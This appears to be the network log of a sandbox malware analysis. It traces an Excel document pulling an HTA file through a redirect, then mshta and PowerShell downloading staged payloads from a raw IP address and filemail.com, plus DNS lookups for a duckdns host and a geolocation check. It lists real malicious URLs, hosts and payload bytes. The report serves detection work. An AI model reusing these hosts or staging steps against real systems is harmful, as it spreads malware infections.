                                                                                                                                                                                Nov 25, 2024 14:07:36.806016922 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.806139946 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.806183100 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.806714058 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.806847095 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.806898117 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.807430983 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.807569981 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.807610989 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.808130026 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.808243990 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.808285952 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.808976889 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.809230089 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.809279919 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.809670925 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.809787035 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.809830904 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.810249090 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.810367107 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.810421944 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.810992956 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.811057091 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.811101913 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.811832905 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.811898947 CET8049177172.234.205.135192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 25, 2024 14:06:33.524346113 CET | 192.168.2.22 | 8.8.8.8 | 0x252d | Standard query (0) | provit.uk | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:06:37.780061007 CET | 192.168.2.22 | 8.8.8.8 | 0xac53 | Standard query (0) | provit.uk | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:06:38.027277946 CET | 192.168.2.22 | 8.8.8.8 | 0xac53 | Standard query (0) | provit.uk | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:06:38.272007942 CET | 192.168.2.22 | 8.8.8.8 | 0xac53 | Standard query (0) | provit.uk | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:06:58.204330921 CET | 192.168.2.22 | 8.8.8.8 | 0xa50c | Standard query (0) | provit.uk | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:06:58.335678101 CET | 192.168.2.22 | 8.8.8.8 | 0xa50c | Standard query (0) | provit.uk | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:06:58.338407040 CET | 192.168.2.22 | 8.8.8.8 | 0x9e0a | Standard query (0) | 3105.filemail.com | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:06:58.470797062 CET | 192.168.2.22 | 8.8.8.8 | 0xa50c | Standard query (0) | provit.uk | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:06:58.600728035 CET | 192.168.2.22 | 8.8.8.8 | 0xfbf7 | Standard query (0) | 3105.filemail.com | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:06:58.608722925 CET | 192.168.2.22 | 8.8.8.8 | 0xa50c | Standard query (0) | provit.uk | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:06:58.733727932 CET | 192.168.2.22 | 8.8.8.8 | 0xa50c | Standard query (0) | provit.uk | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:07:14.829662085 CET | 192.168.2.22 | 8.8.8.8 | 0x116c | Standard query (0) | 3105.filemail.com | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:07:15.203579903 CET | 192.168.2.22 | 8.8.8.8 | 0x9da1 | Standard query (0) | 3105.filemail.com | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:07:22.723668098 CET | 192.168.2.22 | 8.8.8.8 | 0xc6c2 | Standard query (0) | newbeggin.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:07:26.006196022 CET | 192.168.2.22 | 8.8.8.8 | 0xe8b9 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:07:26.252542019 CET | 192.168.2.22 | 8.8.8.8 | 0xe8b9 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 25, 2024 14:06:33.883543968 CET | 8.8.8.8 | 192.168.2.22 | 0x252d | No error (0) | provit.uk |  | 198.244.140.41 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:06:38.026479006 CET | 8.8.8.8 | 192.168.2.22 | 0xac53 | No error (0) | provit.uk |  | 198.244.140.41 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:06:38.271667957 CET | 8.8.8.8 | 192.168.2.22 | 0xac53 | No error (0) | provit.uk |  | 198.244.140.41 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:06:38.406779051 CET | 8.8.8.8 | 192.168.2.22 | 0xac53 | No error (0) | provit.uk |  | 198.244.140.41 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:06:58.335442066 CET | 8.8.8.8 | 192.168.2.22 | 0xa50c | No error (0) | provit.uk |  | 198.244.140.41 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:06:58.470453978 CET | 8.8.8.8 | 192.168.2.22 | 0xa50c | No error (0) | provit.uk |  | 198.244.140.41 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:06:58.589550972 CET | 8.8.8.8 | 192.168.2.22 | 0x9e0a | No error (0) | 3105.filemail.com | ip.3105.filemail.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 25, 2024 14:06:58.589550972 CET | 8.8.8.8 | 192.168.2.22 | 0x9e0a | No error (0) | ip.3105.filemail.com |  | 193.30.119.205 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:06:58.606048107 CET | 8.8.8.8 | 192.168.2.22 | 0xa50c | No error (0) | provit.uk |  | 198.244.140.41 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:06:58.731718063 CET | 8.8.8.8 | 192.168.2.22 | 0xa50c | No error (0) | provit.uk |  | 198.244.140.41 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:06:58.859390020 CET | 8.8.8.8 | 192.168.2.22 | 0xfbf7 | No error (0) | 3105.filemail.com | ip.3105.filemail.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 25, 2024 14:06:58.859390020 CET | 8.8.8.8 | 192.168.2.22 | 0xfbf7 | No error (0) | ip.3105.filemail.com |  | 193.30.119.205 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:06:58.868220091 CET | 8.8.8.8 | 192.168.2.22 | 0xa50c | No error (0) | provit.uk |  | 198.244.140.41 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:07:15.200695038 CET | 8.8.8.8 | 192.168.2.22 | 0x116c | No error (0) | 3105.filemail.com | ip.3105.filemail.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 25, 2024 14:07:15.200695038 CET | 8.8.8.8 | 192.168.2.22 | 0x116c | No error (0) | ip.3105.filemail.com |  | 193.30.119.205 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:07:15.338063955 CET | 8.8.8.8 | 192.168.2.22 | 0x9da1 | No error (0) | 3105.filemail.com | ip.3105.filemail.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 25, 2024 14:07:15.338063955 CET | 8.8.8.8 | 192.168.2.22 | 0x9da1 | No error (0) | ip.3105.filemail.com |  | 193.30.119.205 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:07:23.063751936 CET | 8.8.8.8 | 192.168.2.22 | 0xc6c2 | No error (0) | newbeggin.duckdns.org |  | 31.13.224.72 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:07:26.251352072 CET | 8.8.8.8 | 192.168.2.22 | 0xe8b9 | No error (0) | geoplugin.net |  | 178.237.33.50 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:07:26.497073889 CET | 8.8.8.8 | 192.168.2.22 | 0xe8b9 | No error (0) | geoplugin.net |  | 178.237.33.50 | A (IP address) | IN (0x0001) | false
• provit.uk
• 3105.filemail.com
• 172.234.205.135
• geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49162 | 172.234.205.135 | 80 | 3356 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 14:06:36.130765915 CET | 381 | OUT | GET /1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 172.234.205.135
Connection: Keep-Alive
Nov 25, 2024 14:06:37.319276094 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Mon, 25 Nov 2024 13:06:37 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Mon, 25 Nov 2024 11:44:20 GMT
ETag: "1e074-627bb40d70f1b"
Accept-Ranges: bytes
Content-Length: 122996
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/hta


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49164 | 172.234.205.135 | 80 | 3652 | C:\Windows\System32\mshta.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 14:06:40.603158951 CET | 458 | OUT | GET /1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta HTTP/1.1
Accept: */*
Accept-Language: en-US
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Range: bytes=8896-
Connection: Keep-Alive
Host: 172.234.205.135
If-Range: "1e074-627bb40d70f1b"
Nov 25, 2024 14:06:41.846602917 CET | 1236 | IN | HTTP/1.1 206 Partial Content
Date: Mon, 25 Nov 2024 13:06:41 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Mon, 25 Nov 2024 11:44:20 GMT
ETag: "1e074-627bb40d70f1b"
Accept-Ranges: bytes
Content-Length: 114100
Content-Range: bytes 8896-122995/122996
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/hta


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.22 | 49165 | 172.234.205.135 | 80 | 3760 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 14:06:48.600948095 CET | 391 | OUT | GET /1244/creatgoodideaforfuturebusinessdevelopwithnicethingsgetbackon.tIF HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 172.234.205.135
Connection: Keep-Alive
Nov 25, 2024 14:06:49.776225090 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Mon, 25 Nov 2024 13:06:49 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Mon, 25 Nov 2024 11:41:21 GMT
ETag: "22bb4-627bb36316c8e"
Accept-Ranges: bytes
Content-Length: 142260
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/tiff


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.22 | 49171 | 172.234.205.135 | 80 | 3060 | C:\Windows\System32\mshta.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 14:07:01.242827892 CET | 493 | OUT | GET /1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta HTTP/1.1
Accept: */*
Accept-Language: en-US
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
If-Modified-Since: Mon, 25 Nov 2024 11:44:20 GMT
Connection: Keep-Alive
Host: 172.234.205.135
If-None-Match: "1e074-627bb40d70f1b"
Nov 25, 2024 14:07:02.412417889 CET | 275 | IN | HTTP/1.1 304 Not Modified
Date: Mon, 25 Nov 2024 13:07:02 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Mon, 25 Nov 2024 11:44:20 GMT
ETag: "1e074-627bb40d70f1b"
Accept-Ranges: bytes
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.22 | 49173 | 172.234.205.135 | 80 | 2116 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 14:07:19.815474987 CET | 80 | OUT | GET /1244/SRVRSR.txt HTTP/1.1
Host: 172.234.205.135
Connection: Keep-Alive
Nov 25, 2024 14:07:20.940093040 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Mon, 25 Nov 2024 13:07:20 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Mon, 25 Nov 2024 11:37:43 GMT
ETag: "a0800-627bb293020f5"
Accept-Ranges: bytes
Content-Length: 657408
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.22 | 49176 | 178.237.33.50 | 80 | 3984 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 14:07:27.246915102 CET | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Nov 25, 2024 14:07:28.439371109 CET | 1170 | IN | HTTP/1.1 200 OK
date: Mon, 25 Nov 2024 13:07:28 GMT
server: Apache
content-length: 962
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
Data Ascii: { "geoplugin_request":"8.46.123.75", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.22 | 49177 | 172.234.205.135 | 80 | 3964 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 14:07:34.204668045 CET | 80 | OUT | GET /1244/SRVRSR.txt HTTP/1.1
Host: 172.234.205.135
Connection: Keep-Alive
Nov 25, 2024 14:07:35.375935078 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Mon, 25 Nov 2024 13:07:35 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Mon, 25 Nov 2024 11:37:43 GMT
ETag: "a0800-627bb293020f5"
Accept-Ranges: bytes
Content-Length: 657408
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49161 | 198.244.140.41 | 443 | 3356 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp | Bytes transferred | Direction | Data
2024-11-25 13:06:35 UTC | 403 | OUT | GET /OAffUi?&chairlift=busy&cockpit=blushing&precipitation=honorable&skill=quizzical&timeout HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: provit.uk
Connection: Keep-Alive
2024-11-25 13:06:35 UTC | 452 | IN | HTTP/1.1 302 Found
Content-Length: 104
Content-Type: text/plain; charset=utf-8
Date: Mon, 25 Nov 2024 13:06:35 GMT
Location: http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta
Strict-Transport-Security: max-age=15552000; includeSubDomains
Vary: Accept
X-Content-Type-Options: nosniff
X-Dns-Prefetch-Control: off
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 0
Connection: close
2024-11-25 13:06:35 UTC | 104 | IN | Data Ascii: Found. Redirecting to http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49163 | 198.244.140.41 | 443 | 3652 | C:\Windows\System32\mshta.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-25 13:06:40 UTC | 427 | OUT | GET /OAffUi?&chairlift=busy&cockpit=blushing&precipitation=honorable&skill=quizzical&timeout HTTP/1.1
Accept: */*
Accept-Language: en-US
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: provit.uk
Connection: Keep-Alive
2024-11-25 13:06:40 UTC | 452 | IN | HTTP/1.1 302 Found
Content-Length: 104
Content-Type: text/plain; charset=utf-8
Date: Mon, 25 Nov 2024 13:06:40 GMT
Location: http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta
Strict-Transport-Security: max-age=15552000; includeSubDomains
Vary: Accept
X-Content-Type-Options: nosniff
X-Dns-Prefetch-Control: off
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 0
Connection: close
2024-11-25 13:06:40 UTC | 104 | IN | Data Ascii: Found. Redirecting to http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.22 | 49166 | 198.244.140.41 | 443 | 3356 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp | Bytes transferred | Direction | Data
2024-11-25 13:06:56 UTC | 403 | OUT | GET /OAffUi?&chairlift=busy&cockpit=blushing&precipitation=honorable&skill=quizzical&timeout HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: provit.uk
Connection: Keep-Alive
2024-11-25 13:06:56 UTC | 452 | IN | HTTP/1.1 302 Found
Content-Length: 104
Content-Type: text/plain; charset=utf-8
Date: Mon, 25 Nov 2024 13:06:56 GMT
Location: http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta
Strict-Transport-Security: max-age=15552000; includeSubDomains
Vary: Accept
X-Content-Type-Options: nosniff
X-Dns-Prefetch-Control: off
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 0
Connection: close
2024-11-25 13:06:56 UTC | 104 | IN | Data Ascii: Found. Redirecting to http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.22 | 49170 | 198.244.140.41 | 443 | 3060 | C:\Windows\System32\mshta.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-25 13:07:00 UTC | 427 | OUT | GET /OAffUi?&chairlift=busy&cockpit=blushing&precipitation=honorable&skill=quizzical&timeout HTTP/1.1
Accept: */*
Accept-Language: en-US
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: provit.uk
Connection: Keep-Alive
2024-11-25 13:07:01 UTC | 452 | IN | HTTP/1.1 302 Found
Content-Length: 104
Content-Type: text/plain; charset=utf-8
Date: Mon, 25 Nov 2024 13:07:00 GMT
Location: http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta
Strict-Transport-Security: max-age=15552000; includeSubDomains
Vary: Accept
X-Content-Type-Options: nosniff
X-Dns-Prefetch-Control: off
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 0
Connection: close
2024-11-25 13:07:01 UTC | 104 | IN | Data Ascii: Found. Redirecting to http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.22 | 49168 | 193.30.119.205 | 443 | 2116 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-25 13:07:00 UTC | 211 | OUT | GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1
Host: 3105.filemail.com
Connection: Keep-Alive
2024-11-25 13:07:01 UTC | 328 | IN | HTTP/1.1 200 OK
Content-Length: 2230233
Content-Type: image/jpeg
Last-Modified: Mon, 25 Nov 2024 10:41:01 GMT
Accept-Ranges: bytes
ETag: 67ad55be8fbd7389b2f5ef2b123a44b4
X-Transfer-ID: ibybhsntnwgamsn
Content-Disposition: attachment; filename=new_imagem-vbs.jpg
Date: Mon, 25 Nov 2024 13:06:59 GMT
Connection: close
                                                                                                                                                                                Data Ascii: hCaY8&ctd7*1SR==XiFm[y-q,;{zaxfGHxjha.$V]yezb0OE`ulZhNyg0~-;>u-A[]eEO"?qunqcvpRKa3(ZEZTZ
                                                                                                                                                                                2024-11-25 13:07:01 UTC8192INData Raw: e6 20 f3 f1 19 af a4 d1 ea 16 49 b5 12 6a 44 ac c4 b8 8c 9b 51 c9 ae 48 be d8 07 99 03 c5 2c 2c 68 32 b2 80 bd 79 07 90 6b ae 79 33 1c 53 b2 c8 4c 8a 1b cc de 18 ee 62 55 77 11 74 3a dd 7d 33 77 53 17 8c 3c 12 39 9b 4c bb 48 65 11 b1 05 76 8e 40 f4 f5 26 b3 cb 34 f3 12 0b 3b 5a b9 63 b8 72 59 b8 63 fa 60 13 50 90 23 40 c8 1f 64 8b b8 ef a1 43 73 0a e9 f0 c7 a0 4d 34 9a a8 24 57 68 43 cc c5 d8 90 ca 08 a2 a0 71 fe 6a cc b9 67 69 84 4b 56 51 4a dd f5 f5 16 fc b9 c3 27 88 49 1e 96 18 10 22 94 76 70 db 41 3c 80 39 e3 e1 81 ec 25 89 51 88 25 9a c5 9e 7e 3f 0e d8 34 28 cf b1 08 06 ae 8e 60 cf a4 f1 2d 44 c7 51 26 a2 17 62 80 1e eb 5e d5 55 91 1e 87 5e ae 5a 3d 6c 6a d5 43 6c 8c bc 7c 28 60 7a 38 f4 a1 98 ab 50 e0 ff 00 2c 34 2a 11 42 ec b2 78 bc f3 32 41 e2 ea
                                                                                                                                                                                Data Ascii: IjDQH,,h2yky3SLbUwt:}3wS<9LHev@&4;ZcrYc`P#@dCsM4$WhCqjgiKVQJ'I"vpA<9%Q%~?4(`-DQ&b^U^Z=ljCl|(`z8P,4*Bx2A
                                                                                                                                                                                2024-11-25 13:07:01 UTC8192INData Raw: 41 65 5b 52 54 55 fa 81 37 96 d4 eb 24 fb c1 78 55 49 3a 76 91 9a 39 03 2e d1 63 93 b6 cf 4f 7c 1a 78 8c 8e 93 07 11 b4 b6 82 30 a4 21 90 30 a0 28 f7 e9 80 6f 1b d4 79 30 ed 54 57 f3 55 94 d8 ed 5d 6e fd f3 e7 9e 35 2b a0 11 59 a2 4f 4e fd 33 e8 5e 27 a6 33 69 c1 44 11 88 a3 67 63 cd 80 aa 68 7b 77 39 f3 8f 15 7f 32 73 62 88 ed f9 60 0f 4b aa 68 b4 b2 69 e4 41 24 4e 37 15 2c 46 d3 c1 bb 1f 2c e8 f5 12 69 22 91 12 32 93 b7 57 37 61 6a f8 07 a6 2a 80 b1 f5 38 8f 8e 2e e8 fe 58 de aa 36 32 09 02 12 bb 23 1b d8 1a bd 8b c7 23 01 ad 0e bd 34 7a 59 10 ab 19 0b 31 0e 2a 88 2b 54 7b f5 e7 15 82 59 20 25 e3 62 ac c2 8d 7b 5d e5 5f 4d 22 2a 99 11 95 5b d4 a4 ad 6e cb 32 88 c2 72 ad b8 5d 2f ce bf a6 01 d2 67 5d 5c 33 4c ec fb 1d 5b fe 10 7a 64 eb e6 4d 56 aa 49 93
                                                                                                                                                                                Data Ascii: Ae[RTU7$xUI:v9.cO|x0!0(oy0TWU]n5+YON3^'3iDgch{w92sb`KhiA$N7,F,i"2W7aj*8.X62##4zY1*+T{Y %b{]_M"*[n2r]/g]\3L[zdMVI
                                                                                                                                                                                2024-11-25 13:07:01 UTC8192INData Raw: 40 ca a2 7a 8a 28 34 df 1a c0 45 e1 b7 02 c9 07 b9 c3 1f 0f 55 50 c5 e8 9e 98 63 a6 90 96 21 49 0b f8 98 0e 07 d7 2a 60 63 c9 fa 60 5f c3 34 4c 35 8a e4 f0 2f 68 f7 e0 e6 d1 de aa ca 52 ef a1 f6 c5 bc 31 37 6b 34 b6 3f c4 2f fe 1c df 68 d2 e8 d1 c0 c5 8b 4e d4 c5 c5 83 db 10 13 3b 4e ea 84 2a a9 f6 eb 9e 8d c0 5b 00 0e 73 3d b4 a9 6c c1 28 9e b8 1e 76 75 0d e2 e5 b6 02 09 5a 07 e4 32 ba dd 2e c9 03 06 e5 95 8f ab b5 01 8e 6a 60 d9 e2 d4 05 fe 1f e4 32 de 21 18 06 2d e2 ed 5a 8f c6 b8 c0 46 70 cd e1 f1 a2 90 17 68 35 c7 aa ab af e7 8c 78 06 9d 5d e5 76 65 34 bb 76 b7 43 95 78 83 78 7b 12 a3 d2 c0 29 06 b9 a5 07 fa e1 7c 28 c3 19 65 76 2b 29 61 b6 81 37 7c 7f 5c 04 bc 41 25 87 5d 16 f4 8c 32 a8 2a b1 72 28 31 f7 cd 3d 64 03 69 76 92 71 bb d3 b4 30 0a 38 ef
                                                                                                                                                                                Data Ascii: @z(4EUPc!I*`c`_4L5/hR17k4?/hN;N*[s=l(vuZ2.j`2!-ZFph5x]ve4vCxx{)|(ev+)a7|\A%]2*r(1=divq08
